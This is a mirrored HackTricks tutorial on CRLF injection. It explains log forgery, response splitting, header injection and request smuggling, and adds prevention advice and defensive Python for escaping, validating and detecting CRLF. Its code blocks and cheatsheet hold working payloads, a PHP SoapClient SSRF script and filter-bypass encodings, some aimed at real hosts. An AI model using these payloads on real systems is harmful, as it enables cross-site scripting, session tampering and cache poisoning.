mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-23 13:13:41 +00:00
234 lines
16 KiB
Markdown
# CRLF (%0D%0A) Injection

<details>

<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Other ways to support HackTricks:

* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>

<figure><img src="../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!

{% embed url="https://go.intigriti.com/hacktricks" %}

### CRLF

Carriage Return (CR) and Line Feed (LF), collectively known as CRLF, are special character sequences used in the HTTP protocol to denote the end of a line or the start of a new one. Web servers and browsers use CRLF to distinguish between the HTTP headers and the body of a response. These characters are used universally in HTTP/1.1 communications across the various web server types, such as Apache and Microsoft IIS.

### CRLF Injection Vulnerability

CRLF injection involves inserting CR and LF characters into user-supplied input. This misleads the server, the application, or the user into interpreting the injected sequence as the end of one response and the start of another. While these characters are not inherently harmful, their misuse can lead to HTTP response splitting and other malicious activities.

### Example: CRLF Injection in a Log File

[Example from here](https://www.invicti.com/blog/web-security/crlf-http-header/)

Consider a log file in an admin panel that follows the format `IP - Time - Visited Path`. A typical entry might look like:

```
123.123.123.123 - 08:15 - /index.php?page=home
```

An attacker can leverage a CRLF injection to manipulate this log. By injecting CRLF characters into the HTTP request, the attacker can alter the output stream and fabricate log entries. For instance, an injected sequence might transform the log entry into:

```
/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```

Here, `%0d` and `%0a` are the URL-encoded forms of CR and LF. After the attack, the log would misleadingly display:

```
IP - Time - Visited Path

123.123.123.123 - 08:15 - /index.php?page=home&
127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit
```

The attacker cloaks their malicious activity by making it appear as if localhost (an entity typically trusted within the server environment) performed the actions. The server interprets the part of the request starting with `%0d%0a` as a single parameter, while the `restrictedaction` parameter is parsed as a separate input. The manipulated query mimics a legitimate administrative command: `/index.php?page=home&restrictedaction=edit`
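
The forgery above only works because the logger writes the request path verbatim. The following added example (not from the HackTricks page or the Invicti article) contrasts that naive logger with one that escapes CR, LF and other control characters, so the injected path from the page ends up as one visibly odd entry instead of two plausible ones. The log format and the sample inputs are constructed to match the page.

```python
# Added example: escaping CR/LF in log fields so an injected %0d%0a cannot
# forge a second, trusted-looking log entry.
from urllib.parse import unquote

# Constructed inputs: a normal request path and the injected one from the page,
# URL-decoded the way a web server hands it to the application.
NORMAL_PATH = "/index.php?page=home"
INJECTED_PATH = unquote(
    "/index.php?page=home&%0d%0a127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit"
)


def escape_log_field(value: str) -> str:
    """Make CR, LF and other control characters visible instead of structural."""
    out = []
    for ch in value:
        if ch == "\r":
            out.append("\\r")
        elif ch == "\n":
            out.append("\\n")
        elif ord(ch) < 0x20 or ch == "\x7f":
            out.append("\\x%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def naive_log_line(ip: str, time: str, path: str) -> str:
    # Vulnerable: the path is written verbatim, so an embedded CRLF starts a new line.
    return f"{ip} - {time} - {path}"


def safe_log_line(ip: str, time: str, path: str) -> str:
    # Hardened: one request always produces exactly one log line.
    return f"{ip} - {time} - {escape_log_field(path)}"


def count_entries(log_text: str) -> int:
    """How many entries a line-oriented log reader (grep, SIEM parser) would see."""
    return len([line for line in log_text.splitlines() if line.strip()])


if __name__ == "__main__":
    print(naive_log_line("123.123.123.123", "08:15", INJECTED_PATH))
    print(safe_log_line("123.123.123.123", "08:15", INJECTED_PATH))
```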

### HTTP Response Splitting

#### Description

HTTP Response Splitting is a security vulnerability that arises when an attacker exploits the structure of HTTP responses. This structure separates the headers from the body using a specific character sequence, Carriage Return (CR) followed by Line Feed (LF), collectively termed CRLF. If an attacker manages to insert a CRLF sequence into a response header, they can effectively manipulate the content of the rest of the response. This type of manipulation can lead to severe security issues, notably Cross-Site Scripting (XSS).

#### XSS through HTTP Response Splitting

1. The application sets a custom header like this: `X-Custom-Header: UserInput`
2. The application fetches the value for `UserInput` from a query parameter, say `user_input`. In scenarios lacking proper input validation and encoding, an attacker can craft a payload that includes the CRLF sequence, followed by malicious content.
3. The attacker crafts a URL with a specially prepared `user_input`: `?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>`
   * In this URL, `%0d%0a%0d%0a` is the URL-encoded form of CRLFCRLF. It tricks the server into inserting a CRLF sequence, making the server treat the part that follows as the response body.
4. The server reflects the attacker's input in the response header, leading to an unintended response structure where the malicious script is interpreted by the browser as part of the response body.

#### Example of HTTP Response Splitting leading to a Redirect

From [https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62](https://medium.com/bugbountywriteup/bugbounty-exploiting-crlf-injection-can-lands-into-a-nice-bounty-159525a9cb62)

Browser to:

```
/%0d%0aLocation:%20http://myweb.com
```

And the server responds with the header:

```
Location: http://myweb.com
```

**Another example: (from** [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)**)**

```
http://www.example.com/somepage.php?page=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
```

#### In the URL Path

You can send the payload **inside the URL path** to control the **response** from the server (example from [here](https://hackerone.com/reports/192667)):

```
http://stagecafrstore.starbucks.com/%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
http://stagecafrstore.starbucks.com/%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
```

Find more examples in:

{% embed url="https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md" %}

### HTTP Header Injection

HTTP Header Injection, often exploited through CRLF (Carriage Return and Line Feed) injection, allows attackers to insert HTTP headers. This can undermine security mechanisms such as XSS (Cross-Site Scripting) filters or the SOP (Same-Origin Policy), potentially leading to unauthorized access to sensitive data, such as CSRF tokens, or to the manipulation of user sessions through cookie planting.

#### Exploiting CORS via HTTP Header Injection

An attacker can inject HTTP headers to enable CORS (Cross-Origin Resource Sharing), bypassing the restrictions imposed by the SOP. This breach allows scripts from malicious origins to interact with resources from a different origin, potentially accessing protected data.

#### SSRF and HTTP Request Injection via CRLF

CRLF injection can be used to craft and inject an entirely new HTTP request. A notable example of this is the vulnerability in PHP's `SoapClient` class, specifically in the `user_agent` parameter. By manipulating this parameter, an attacker can insert additional headers and body content, or even inject a whole new HTTP request. Below is a PHP example demonstrating this exploitation:

```php
$target = 'http://127.0.0.1:9090/test';
$post_string = 'variable=post value';
$crlf = array(
    'POST /proxy HTTP/1.1',
    'Host: local.host.htb',
    'Cookie: PHPSESSID=[PHPSESSID]',
    'Content-Type: application/x-www-form-urlencoded',
    'Content-Length: '.(string)strlen($post_string),
    "\r\n",
    $post_string
);

$client = new SoapClient(null,
    array(
        'uri'=>$target,
        'location'=>$target,
        'user_agent'=>"IGN\r\n\r\n".join("\r\n",$crlf)
    )
);

# Put a netcat listener on port 9090
$client->__soapCall("test", []);
```

### Header Injection to Request Smuggling

For more information about this technique and potential problems [**check the original source**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning).

You can inject essential headers to ensure that the **back-end keeps the connection open** after responding to the initial request:

```
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0a HTTP/1.1
```

Afterwards, a second request can be specified. This scenario typically involves [HTTP request smuggling](http-request-smuggling/), a technique where extra headers or body elements appended by the server after the injection can lead to various security exploits.

**Exploitation:**

1. **Malicious Prefix Injection**: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:

   `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1`

2. **Crafting a Prefix for Response Queue Poisoning**: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:

   `GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1`

### Memcache Injection

Memcache is a **key-value store that uses a clear-text protocol**. More information in:

{% content-ref url="../network-services-pentesting/11211-memcache/" %}
[11211-memcache](../network-services-pentesting/11211-memcache/)
{% endcontent-ref %}

**For the full information read the** [**original writeup**](https://www.sonarsource.com/blog/zimbra-mail-stealing-clear-text-credentials-via-memcache-injection/)

If a platform takes **data from an HTTP request and uses it without sanitizing** it to make **requests** to a **memcache** server, an attacker can abuse this behaviour to **inject new memcache commands**.

For example, in the originally discovered vulnerability, cache keys were used to return the IP address and port a user should connect to, and attackers were able to **inject memcache commands** that would **poison** the **cache into sending the victims' details** (usernames and passwords included) to the attacker's server:

<figure><img src="../.gitbook/assets/image (656).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/ba72cd16-2ca0-447b-aa70-5cde302a0b88/body-578d9f9f-1977-4e34-841c-ad870492328f_10.png?w=1322&h=178&auto=format&fit=crop"><figcaption></figcaption></figure>

Moreover, the researchers also discovered that they could desync the memcache responses so that the attacker's IP address and port were sent to users whose email address the attacker did not know:

<figure><img src="../.gitbook/assets/image (634).png" alt="https://assets-eu-01.kc-usercontent.com/d0f02280-9dfb-0116-f970-137d713003b6/c6c1f3c4-d244-4bd9-93f7-2c88f139acfa/body-3f9ceeb9-3d6b-4867-a23f-e0e50a46a2e9_14.png?w=1322&h=506&auto=format&fit=crop"><figcaption></figcaption></figure>

### How to Prevent CRLF / HTTP Header Injections in Web Applications

To mitigate the risk of CRLF (Carriage Return and Line Feed) or HTTP header injection in web applications, the following strategies are recommended:

1. **Avoid Direct User Input in Response Headers:** The safest approach is to refrain from placing user-supplied input directly into response headers.
2. **Encode or Reject Special Characters:** If avoiding direct user input is not feasible, make sure to use a function dedicated to encoding (or rejecting) special characters such as CR (Carriage Return) and LF (Line Feed). This practice removes the possibility of CRLF injection.
3. **Update the Programming Language:** Regularly update the programming language used in your web applications to the latest version. Choose a version that inherently disallows the injection of CR and LF characters within the functions responsible for setting HTTP headers.
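
To make the second recommendation concrete, and to tie it back to the `X-Custom-Header: UserInput` scenario from the response-splitting section, here is an added example (not code from the HackTricks page) that builds a raw HTTP/1.1 response twice: once by concatenating the user value into the header line, and once behind a validator that only accepts visible ASCII, space and tab in a field value. The validator is stricter than the RFC 9110 field-value grammar (it also refuses obs-text bytes above 0x7E), which is what also stops the Unicode lookalike characters listed in the cheatsheet below from reaching a back end that truncates them to 0x0A/0x0D.

```python
# Added example: vulnerable vs. hardened header setter for the
# "X-Custom-Header: UserInput" case.
from urllib.parse import unquote

# Constructed input: the reflected XSS payload from the page, already URL-decoded
# the way a framework would hand it to the application.
PAYLOAD = unquote("Value%0d%0a%0d%0a<script>alert('XSS')</script>")


def build_response_vulnerable(user_input: str) -> bytes:
    # Vulnerable: the user value is concatenated straight into a header line,
    # so an embedded CRLFCRLF ends the header block early.
    headers = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/plain",
        f"X-Custom-Header: {user_input}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + "hello").encode()


def validate_header_value(value: str) -> str:
    """Accept only visible ASCII, SP and HTAB; reject CR, LF, NUL, other controls
    and anything non-ASCII (stricter than RFC 9110, which allows obs-text)."""
    for ch in value:
        code = ord(ch)
        if ch in ("\r", "\n", "\x00"):
            raise ValueError("CR/LF/NUL not allowed in header value")
        if (code < 0x20 and ch != "\t") or code >= 0x7F:
            raise ValueError("non-printable or non-ASCII character in header value")
    return value


def build_response_hardened(user_input: str) -> bytes:
    # Hardened: the value must pass validation before it touches the wire.
    headers = [
        "HTTP/1.1 200 OK",
        "Content-Type: text/plain",
        f"X-Custom-Header: {validate_header_value(user_input)}",
    ]
    return ("\r\n".join(headers) + "\r\n\r\n" + "hello").encode()


def body_of(raw: bytes) -> bytes:
    """What a browser treats as the body: everything after the first blank line."""
    return raw.split(b"\r\n\r\n", 1)[1]
```

With the payload the vulnerable builder yields a body that starts with the injected `<script>` tag; the hardened builder raises `ValueError` instead of emitting the response.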

### CHEATSHEET

[Cheatsheet from here](https://twitter.com/NinadMishra5/status/1650080604174667777)

```
1. HTTP Response Splitting
• /%0D%0ASet-Cookie:mycookie=myvalue (Check if the response is setting this cookie)

2. CRLF chained with Open Redirect
• //www.google.com/%2F%2E%2E%0D%0AHeader-Test:test2
• /www.google.com/%2E%2E%2F%0D%0AHeader-Test:test2
• /google.com/%2F..%0D%0AHeader-Test:test2
• /%0d%0aLocation:%20http://example.com

3. CRLF Injection to XSS
• /%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23
• /%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E

4. Filter Bypass
• %E5%98%8A = %0A = \u560a
• %E5%98%8D = %0D = \u560d
• %E5%98%BE = %3E = \u563e (>)
• %E5%98%BC = %3C = \u563c (<)
• Payload = %E5%98%8A%E5%98%8DSet-Cookie:%20test
```
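
The same encodings the cheatsheet lists for bypassing filters are what a defender has to normalize before looking for CR/LF in traffic. The following added example (not part of the HackTricks page) runs over a few constructed access-log lines in combined log format and flags request targets that contain CR or LF after repeated URL-decoding, treating U+560A/U+560D as the LF/CR they get truncated to.

```python
# Added example: flagging CRLF-injection probes in web-server access logs.
import re
from urllib.parse import unquote

# Constructed sample access-log lines; the probe paths are taken from the cheatsheet
# above, the last one is the same %0d%0a probe double-encoded.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Nov/2024:10:00:01 +0000] "GET /index.php?page=home HTTP/1.1" 200 512
203.0.113.7 - - [10/Nov/2024:10:00:02 +0000] "GET /%0D%0ASet-Cookie:mycookie=myvalue HTTP/1.1" 302 0
203.0.113.9 - - [10/Nov/2024:10:00:03 +0000] "GET /%E5%98%8A%E5%98%8DSet-Cookie:%20test HTTP/1.1" 200 0
203.0.113.11 - - [10/Nov/2024:10:00:04 +0000] "GET /%3f%0d%0aLocation:%0d%0aContent-Type:text/html HTTP/1.1" 200 0
203.0.113.13 - - [10/Nov/2024:10:00:05 +0000] "GET /search?q=%25%30%64%25%30%61 HTTP/1.1" 200 10
"""

# Request target inside the quoted request line of the combined log format.
REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|DELETE|HEAD|OPTIONS|PATCH) (\S+) HTTP/')


def normalize(path: str) -> str:
    """URL-decode up to three times (catches double encoding) and map the Unicode
    lookalikes U+560A/U+560D onto the LF/CR some back ends truncate them to."""
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\u560a", "\n").replace("\u560d", "\r")


def is_crlf_probe(path: str) -> bool:
    normalized = normalize(path)
    return "\r" in normalized or "\n" in normalized


def flag_crlf_probes(log_text: str) -> list:
    """Return the client IPs of log lines whose request target carries CR or LF."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_crlf_probe(match.group(1)):
            hits.append(line.split(" ", 1)[0])
    return hits


if __name__ == "__main__":
    print(flag_crlf_probes(SAMPLE_LOG))
```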

## Automatic Tools

* [https://github.com/Raghavd3v/CRLFsuite](https://github.com/Raghavd3v/CRLFsuite)
* [https://github.com/dwisiswant0/crlfuzz](https://github.com/dwisiswant0/crlfuzz)

## Brute-Force Detection List

* [https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt](https://github.com/carlospolop/Auto\_Wordlists/blob/main/wordlists/crlf.txt)

## References

* [**https://www.invicti.com/blog/web-security/crlf-http-header/**](https://www.invicti.com/blog/web-security/crlf-http-header/)
* [**https://www.acunetix.com/websitesecurity/crlf-injection/**](https://www.acunetix.com/websitesecurity/crlf-injection/)
* [**https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning**](https://portswigger.net/research/making-http-header-injection-critical-via-response-queue-poisoning)
* [**https://www.netsparker.com/blog/web-security/crlf-http-header/**](https://www.netsparker.com/blog/web-security/crlf-http-header/)